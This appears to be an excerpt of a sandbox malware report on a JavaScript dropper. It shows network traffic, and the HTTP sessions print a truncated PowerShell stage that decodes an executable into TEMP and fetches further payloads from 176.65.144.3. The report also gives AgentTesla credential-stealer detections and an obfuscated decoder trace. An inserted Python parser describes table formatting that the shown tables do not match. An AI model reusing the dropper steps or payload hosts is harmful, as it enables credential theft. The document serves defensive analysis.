Mar 18, 2025 08:03:23.524813890 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.524830103 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.524846077 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.524857998 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.524857998 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.524903059 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.525505066 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.525523901 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.525540113 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.525553942 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.525568962 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.525582075 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.525583029 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.525598049 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.525605917 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.525625944 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.525649071 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.525666952 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.525684118 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.525696039 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.525710106 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.525715113 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.525715113 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.525723934 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.525738955 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.525753975 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.525759935 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.525769949 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.525779009 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.525791883 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.525841951 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.526325941 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.526339054 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.526359081 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.526379108 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.526386023 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.526393890 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.526408911 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.526423931 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.526432991 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.526432991 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.526489019 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.704240084 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:24.015414000 CET | 80 | 49721 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:24.015577078 CET | 49721 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:24.356291056 CET | 49724 | 80 | 192.168.2.4 | 208.95.112.1
Mar 18, 2025 08:03:24.362137079 CET | 80 | 49724 | 208.95.112.1 | 192.168.2.4
Mar 18, 2025 08:03:24.362227917 CET | 49724 | 80 | 192.168.2.4 | 208.95.112.1
Mar 18, 2025 08:03:24.362596035 CET | 49724 | 80 | 192.168.2.4 | 208.95.112.1
Mar 18, 2025 08:03:24.368684053 CET | 80 | 49724 | 208.95.112.1 | 192.168.2.4
Mar 18, 2025 08:03:24.850461006 CET | 80 | 49724 | 208.95.112.1 | 192.168.2.4
Mar 18, 2025 08:03:24.893063068 CET | 49724 | 80 | 192.168.2.4 | 208.95.112.1
Mar 18, 2025 08:03:25.256035089 CET | 49721 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:33.448631048 CET | 65080 | 53 | 192.168.2.4 | 162.159.36.2
Mar 18, 2025 08:03:33.453320980 CET | 53 | 65080 | 162.159.36.2 | 192.168.2.4
Mar 18, 2025 08:03:33.453407049 CET | 65080 | 53 | 192.168.2.4 | 162.159.36.2
Mar 18, 2025 08:03:33.458200932 CET | 53 | 65080 | 162.159.36.2 | 192.168.2.4
Mar 18, 2025 08:03:33.902091026 CET | 65080 | 53 | 192.168.2.4 | 162.159.36.2
Mar 18, 2025 08:03:33.907059908 CET | 53 | 65080 | 162.159.36.2 | 192.168.2.4
Mar 18, 2025 08:03:33.907128096 CET | 65080 | 53 | 192.168.2.4 | 162.159.36.2
Mar 18, 2025 08:04:40.244647980 CET | 80 | 49724 | 208.95.112.1 | 192.168.2.4
Mar 18, 2025 08:04:40.244805098 CET | 49724 | 80 | 192.168.2.4 | 208.95.112.1
Mar 18, 2025 08:05:04.862266064 CET | 49724 | 80 | 192.168.2.4 | 208.95.112.1
Mar 18, 2025 08:05:04.867058992 CET | 80 | 49724 | 208.95.112.1 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 18, 2025 08:03:24.330837965 CET | 56513 | 53 | 192.168.2.4 | 1.1.1.1
Mar 18, 2025 08:03:24.337415934 CET | 53 | 56513 | 1.1.1.1 | 192.168.2.4
Mar 18, 2025 08:03:33.447439909 CET | 53 | 63543 | 162.159.36.2 | 192.168.2.4
Mar 18, 2025 08:03:33.921622038 CET | 60847 | 53 | 192.168.2.4 | 1.1.1.1
Mar 18, 2025 08:03:33.942161083 CET | 53 | 60847 | 1.1.1.1 | 192.168.2.4
Mar 18, 2025 08:03:35.179347038 CET | 49385 | 53 | 192.168.2.4 | 1.1.1.1
Mar 18, 2025 08:03:35.190536022 CET | 53 | 49385 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 18, 2025 08:03:24.330837965 CET | 192.168.2.4 | 1.1.1.1 | 0x7743 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Mar 18, 2025 08:03:33.921622038 CET | 192.168.2.4 | 1.1.1.1 | 0xef30 | Standard query (0) | 206.23.85.13.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Mar 18, 2025 08:03:35.179347038 CET | 192.168.2.4 | 1.1.1.1 | 0xd709 | Standard query (0) | 212.20.149.52.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 18, 2025 08:03:24.337415934 CET | 1.1.1.1 | 192.168.2.4 | 0x7743 | No error (0) | ip-api.com | - | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Mar 18, 2025 08:03:33.942161083 CET | 1.1.1.1 | 192.168.2.4 | 0xef30 | Name error (3) | 206.23.85.13.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Mar 18, 2025 08:03:35.190536022 CET | 1.1.1.1 | 192.168.2.4 | 0xd709 | Name error (3) | 212.20.149.52.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
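The packet tables in this report are extracted with their five columns run together (a row reads `...CET8049723176.65.144.3192.168.2.4`), and the split is genuinely ambiguous: `8049723` could be ports 80/49723, 804/9723 or 8049/723, and `3192.168.2.4` could end the source address with `3` or with `31`. The Python below is an added example, not part of the Joe Sandbox report: it enumerates every split that satisfies the hard constraints (two valid dotted quads, two ports in 1-65535, no leading zeros), ranks the candidates by whether the addresses are in the report's own contacted-host list and whether one port is a service port paired with a Windows ephemeral port, and refuses to guess when two candidates tie. The sample rows are copied from the tables above; `KNOWN_HOSTS` and `SERVICE_PORTS` are assumptions taken from this report and would be replaced for a different analysis.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Constructed sample: rows copied from the flattened TCP/UDP tables of this report.
SAMPLE_ROWS = [
    "Mar 18, 2025 08:03:23.403522968 CET8049723176.65.144.3192.168.2.4",
    "Mar 18, 2025 08:03:23.403621912 CET4972380192.168.2.4176.65.144.3",
    "Mar 18, 2025 08:03:24.356291056 CET4972480192.168.2.4208.95.112.1",
    "Mar 18, 2025 08:03:24.337415934 CET53565131.1.1.1192.168.2.4",
    "Mar 18, 2025 08:03:33.448631048 CET6508053192.168.2.4162.159.36.2",
]

# Assumptions taken from this report: the analysis VM, the hosts it contacted, and the
# services seen in the HTTP/DNS sections. Substitute your own set for another report.
KNOWN_HOSTS = {"192.168.2.4", "176.65.144.3", "208.95.112.1", "162.159.36.2", "1.1.1.1"}
SERVICE_PORTS = {53, 80, 443}
EPHEMERAL_MIN = 49152          # start of the Windows dynamic (ephemeral) port range


@dataclass(frozen=True)
class Packet:
    timestamp: str
    sport: int
    dport: int
    src: str
    dst: str


def _valid_ip(s: str) -> bool:
    parts = s.split(".")
    return len(parts) == 4 and all(
        p.isdigit() and (len(p) == 1 or p[0] != "0") and int(p) <= 255 for p in parts
    )


def _valid_port(s: str) -> bool:
    return s.isdigit() and s[0] != "0" and 1 <= int(s) <= 65535


def _candidates(tail: str) -> list:
    """Every (sport, dport, src, dst) split of the digit/dot tail that is syntactically legal."""
    out = []
    for i in range(1, len(tail)):              # start of the destination IP
        dst = tail[i:]
        if not _valid_ip(dst):
            continue
        for j in range(1, i):                  # start of the source IP
            src, ports = tail[j:i], tail[:j]
            if not _valid_ip(src) or not ports.isdigit():
                continue
            for k in range(1, len(ports)):     # boundary between the two ports
                sp, dp = ports[:k], ports[k:]
                if _valid_port(sp) and _valid_port(dp):
                    out.append((int(sp), int(dp), src, dst))
    return out


def _score(cand) -> int:
    """Higher is more plausible: known hosts, service/ephemeral pairing, known service port."""
    sp, dp, src, dst = cand
    score = 2 * ((src in KNOWN_HOSTS) + (dst in KNOWN_HOSTS))
    lo, hi = sorted((sp, dp))
    if lo < 1024 and hi >= EPHEMERAL_MIN:
        score += 1
    if lo in SERVICE_PORTS:
        score += 1
    return score


def parse_row(row: str) -> Packet:
    """Split one flattened row; raise ValueError instead of guessing when it stays ambiguous."""
    ts, sep, tail = row.partition(" CET")
    if not sep:
        raise ValueError(f"no timezone marker in {row!r}")
    ranked = sorted(_candidates(tail), key=_score, reverse=True)
    if not ranked:
        raise ValueError(f"no legal split for {tail!r}")
    if len(ranked) > 1 and _score(ranked[0]) == _score(ranked[1]):
        raise ValueError(f"ambiguous split for {tail!r}: {ranked[0]} vs {ranked[1]}")
    sp, dp, src, dst = ranked[0]
    return Packet(ts + " CET", sp, dp, src, dst)


def summarize(rows) -> Counter:
    """Packets per conversation, keyed by the sorted endpoint pair so both directions merge."""
    conv = Counter()
    for pkt in map(parse_row, rows):
        conv[tuple(sorted([(pkt.src, pkt.sport), (pkt.dst, pkt.dport)]))] += 1
    return conv


if __name__ == "__main__":
    for (a_ip, a_port), (b_ip, b_port) in summarize(SAMPLE_ROWS):
        print(f"{a_ip}:{a_port} <-> {b_ip}:{b_port}")
```

On the five sample rows every line resolves to a single best candidate (for the DNS reply row, `53/56513` from `1.1.1.1` beats `53565/13`, which only the service-port rule separates). Rows from another report may still tie; the parser raises rather than silently picking one, which is the right failure mode when the output feeds an IOC list.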
                                                                  • 176.65.144.3
                                                                  • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49721 | 176.65.144.3 | 80 | 7260 | C:\Windows\System32\wscript.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2025 08:03:18.325815916 CET | 329 | OUT | GET /dev/devil.ps1 HTTP/1.1
Accept: */*
Accept-Language: en-ch
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 176.65.144.3
Connection: Keep-Alive
Mar 18, 2025 08:03:19.002636909 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Tue, 18 Mar 2025 07:03:18 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Mon, 17 Mar 2025 08:28:15 GMT
ETag: "12351-6308591d076a3"
Accept-Ranges: bytes
Content-Length: 74577
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
                                                                  Data Raw: 24 53 41 46 41 47 47 41 47 58 48 58 48 58 3d 5b 49 4f 2e 50 61 74 68 5d 3a 3a 43 6f 6d 62 69 6e 65 28 24 65 6e 76 3a 54 45 4d 50 2c 22 51 57 51 57 53 41 41 44 41 46 2e 65 78 65 22 29 0d 0a 5b 49 4f 2e 46 69 6c 65 5d 3a 3a 57 72 69 74 65 41 6c 6c 42 79 74 65 73 28 24 53 41 46 41 47 47 41 47 58 48 58 48 58 2c 5b 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 46 41 4b 6b 30 57 36 38 41 41 41 41 41 41 41 41 41 41 4f 41 41 41 67 45 4c 41 54 [TRUNCATED]
                                                                  Data Ascii: $SAFAGGAGXHXHX=[IO.Path]::Combine($env:TEMP,"QWQWSAADAF.exe")[IO.File]::WriteAllBytes($SAFAGGAGXHXHX,[Convert]::FromBase64String(" [TRUNCATED]


                                                                  Session ID: 1 | Source IP: 192.168.2.4 | Source Port: 49723 | Destination IP: 176.65.144.3 | Destination Port: 80 | PID: 2976 | Process: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Mar 18, 2025 08:03:22.342149973 CET | 73 bytes | OUT | GET /dev/DEV.exe HTTP/1.1
                                                                  Host: 176.65.144.3
                                                                  Connection: Keep-Alive
                                                                  Mar 18, 2025 08:03:23.045909882 CET | 1236 bytes | IN | HTTP/1.1 200 OK
                                                                  Date: Tue, 18 Mar 2025 07:03:22 GMT
                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                  Last-Modified: Tue, 11 Mar 2025 15:54:49 GMT
                                                                  ETag: "3be00-630131bd532ab"
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 245248
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/x-msdownload


                                                                  Session ID: 2 | Source IP: 192.168.2.4 | Source Port: 49724 | Destination IP: 208.95.112.1 | Destination Port: 80 | PID: 5376 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Mar 18, 2025 08:03:24.362596035 CET | 80 bytes | OUT | GET /line/?fields=hosting HTTP/1.1
                                                                  Host: ip-api.com
                                                                  Connection: Keep-Alive
                                                                  Mar 18, 2025 08:03:24.850461006 CET | 175 bytes | IN | HTTP/1.1 200 OK
                                                                  Date: Tue, 18 Mar 2025 07:03:23 GMT
                                                                  Content-Type: text/plain; charset=utf-8
                                                                  Content-Length: 6
                                                                  Access-Control-Allow-Origin: *
                                                                  X-Ttl: 60
                                                                  X-Rl: 44
                                                                  Data Raw: 66 61 6c 73 65 0a
                                                                  Data Ascii: false



                                                                  Target ID:0
                                                                  Start time:03:03:03
                                                                  Start date:18/03/2025
                                                                  Path:C:\Windows\System32\wscript.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_111101111001.js"
                                                                  Imagebase:0x7ff651a10000
                                                                  File size:170'496 bytes
                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:9
                                                                  Start time:03:03:18
                                                                  Start date:18/03/2025
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"
                                                                  Imagebase:0x7ff7016f0000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:10
                                                                  Start time:03:03:18
                                                                  Start date:18/03/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff62fc20000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:11
                                                                  Start time:03:03:21
                                                                  Start date:18/03/2025
                                                                  Path:C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe"
                                                                  Imagebase:0x3b0000
                                                                  File size:55'808 bytes
                                                                  MD5 hash:509DA2F325053AC8CFC07C6EDDE04DE6
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1367785643.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.1367785643.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1367785643.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.1367785643.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:12
                                                                  Start time:03:03:22
                                                                  Start date:18/03/2025
                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                                  Imagebase:0xe80000
                                                                  File size:56'368 bytes
                                                                  MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2446694240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2446694240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2454758646.00000000031C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:moderate
                                                                  Has exited:false

                                                                  Call Graph

                                                                  [Call graph figure not preserved. Legend: Executed / Not Executed. Recoverable node names: the entry point calls c, 'CreateObject', l, DownloadScript, LogError and RunPowerShellScript; DownloadScript calls c, 'Open', m, 'Send' and LogError; RunPowerShellScript calls c and LogError; the string-decoding helpers use 'charAt', 'fromCharCode', 'indexOf', 'slice', 'toString', 'charCodeAt', decodeURIComponent, parseInt, 'push' and 'shift'.]

                                                                  Script:

                                                                  Code
                                                                  function c(b, d) {
                                                                  • c(516) ➔ "\x15Pi\xdd}wH;\xfd\xc5\x1c\xcc"
                                                                  • c(497) ➔ "\xa4H\xfbww\xdc%:\x03\x96&\x03\xb2"
                                                                  • c(513) ➔ "\xd6\xbe\xaewO $\x06\xc1^\xac(\xa85\x8d\xea\x95\x0e}|\xf1\x03\xdc5^\xb7"
                                                                  • c(500) ➔ "4xOyvhS"
                                                                  • c(527) ➔ "Run"
                                                                  • c(516) ➔ "\xdd)\xbe\xd7\xe0~\xa0 \xe1*"
                                                                  • c(497) ➔ "\xbd\xcb\x8b\xe1\x90"
                                                                  • c(513) ➔ "5144112GbDKJt"
                                                                  • c(500) ➔ "Status"
                                                                  • c(527) ➔ "\xb4\xfaR\x14\xecO0\xcf\xa5 \xa6\x9fBZ\xf5\x99\xaeoG\xaf\x89\x8bZ\x8f\x8b\xd8"
                                                                  var e = a();
                                                                  • a() ➔ iCoHWQ95euBdJSkIhmoIxSoo,s1vsiGzsWR3dOCkSW4hdKmki,nsPZWRmVDmojW6iZsW,WQriW7T3D8oCjtOdWPyMa8kY,WR3dI8klW6hcKa,WPZcONOXqmoDWQ4zFuqa,nhHpExzOuW,u3rHDhvZ,ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia,ndGYmuT5ugLpqG,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,q3jLyxrLt2jQzwn0,W53dRCoWvG,wCoIWP8znCoXehRdV8k0aCoByG,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,bSo1W4W,WOtcGSkzW6O4W4NdS8kjncddJefj,W4mtWRdcPeVdTwiGure,W6iXEKqyW58,W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC,nte0ndeXmKDIreTkDa,W57dGCkTW6ZcG8oEW48,fvbPW519D0G7W73dHrZdJa,W50PWR7dL8oGFSkGimoHkG,v1nJCMLWDc5tAgvSBa,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX,vMtcJeFcKhtdUa7cG8kCpbTh,pLP2W4P5yMG,mZHLEwnXu3G,WRtdPmoQkGOLgX7dSZ/cHG,c8k1s8k5ASkEW5P4fmoVWONdJrW,mte0nZnJuuDNt0O,f8kJBKq,uNvU,WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy,oglcUxpcM8ocWRzJW4O7WOxdVbvt,wbSaW6/cIW,nfn9c8ocWOiqEWddGSkU   (same 38-entry array returned on each of the first 5 runs)
                                                                  • a() ➔ s1vsiGzsWR3dOCkSW4hdKmki,nsPZWRmVDmojW6iZsW,WQriW7T3D8oCjtOdWPyMa8kY,WR3dI8klW6hcKa,WPZcONOXqmoDWQ4zFuqa,nhHpExzOuW,u3rHDhvZ,ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia,ndGYmuT5ugLpqG,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,q3jLyxrLt2jQzwn0,W53dRCoWvG,wCoIWP8znCoXehRdV8k0aCoByG,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,bSo1W4W,WOtcGSkzW6O4W4NdS8kjncddJefj,W4mtWRdcPeVdTwiGure,W6iXEKqyW58,W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC,nte0ndeXmKDIreTkDa,W57dGCkTW6ZcG8oEW48,fvbPW519D0G7W73dHrZdJa,W50PWR7dL8oGFSkGimoHkG,v1nJCMLWDc5tAgvSBa,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX,vMtcJeFcKhtdUa7cG8kCpbTh,pLP2W4P5yMG,mZHLEwnXu3G,WRtdPmoQkGOLgX7dSZ/cHG,c8k1s8k5ASkEW5P4fmoVWONdJrW,mte0nZnJuuDNt0O,f8kJBKq,uNvU,WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy,oglcUxpcM8ocWRzJW4O7WOxdVbvt,wbSaW6/cIW,nfn9c8ocWOiqEWddGSkU,iCoHWQ95euBdJSkIhmoIxSoo   (next 5 runs: the same array rotated by one, the former first entry now last)
                                                                  return c = function (f, g) {
                                                                    • c(516,undefined) ➔ "\x15Pi\xdd}wH;\xfd\xc5\x1c\xcc"
                                                                    • c(497,undefined) ➔ "\xa4H\xfbww\xdc%:\x03\x96&\x03\xb2"
                                                                    • c(513,undefined) ➔ "\xd6\xbe\xaewO $\x06\xc1^\xac(\xa85\x8d\xea\x95\x0e}|\xf1\x03\xdc5^\xb7"
                                                                    • c(500,undefined) ➔ "4xOyvhS"
                                                                    • c(527,undefined) ➔ "Run"
                                                                    • c(516,undefined) ➔ "\xdd)\xbe\xd7\xe0~\xa0 \xe1*"
                                                                    • c(497,undefined) ➔ "\xbd\xcb\x8b\xe1\x90"
                                                                    • c(513,undefined) ➔ "5144112GbDKJt"
                                                                    • c(500,undefined) ➔ "Status"
                                                                    • c(527,undefined) ➔ "\xb4\xfaR\x14\xecO0\xcf\xa5 \xa6\x9fBZ\xf5\x99\xaeoG\xaf\x89\x8bZ\x8f\x8b\xd8"
                                                                    f = f - 0x1ee;
                                                                      var h = e[f];
                                                                        if ( c['wqqHnW'] === undefined )
                                                                          {
                                                                            var i = function (m) {
                                                                            • function (f, g).ENqiuT("fvbPW519D0G7W73dHrZdJa") ➔ "\x15Pi\xdd}wH;\xfd\xc5\x1c\xcc"
                                                                            • function (f, g).ENqiuT("WQriW7T3D8oCjtOdWPyMa8kY") ➔ "\xa4H\xfbww\xdc%:\x03\x96&\x03\xb2"
                                                                            • function (f, g).ENqiuT("W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC") ➔ "\xd6\xbe\xaewO $\x06\xc1^\xac(\xa85\x8d\xea\x95\x0e}|\xf1\x03\xdc5^\xb7"
                                                                            • function (f, g).ENqiuT("nhHpExzOuW") ➔ "4xOyvhS"
                                                                            • function (f, g).ENqiuT("uNvU") ➔ "Run"
                                                                            • function (f, g).ENqiuT("W50PWR7dL8oGFSkGimoHkG") ➔ "\xdd)\xbe\xd7\xe0~\xa0 \xe1*"
                                                                            • function (f, g).ENqiuT("WR3dI8klW6hcKa") ➔ "\xbd\xcb\x8b\xe1\x90"
                                                                            • function (f, g).ENqiuT("nte0ndeXmKDIreTkDa") ➔ "5144112GbDKJt"
                                                                            • function (f, g).ENqiuT("u3rHDhvZ") ➔ "Status"
                                                                            • function (f, g).ENqiuT("WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy") ➔ "\xb4\xfaR\x14\xecO0\xcf\xa5 \xa6\x9fBZ\xf5\x99\xaeoG\xaf\x89\x8bZ\x8f\x8b\xd8"
                                                                              var n = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
                                                                                var o = '', p = '';
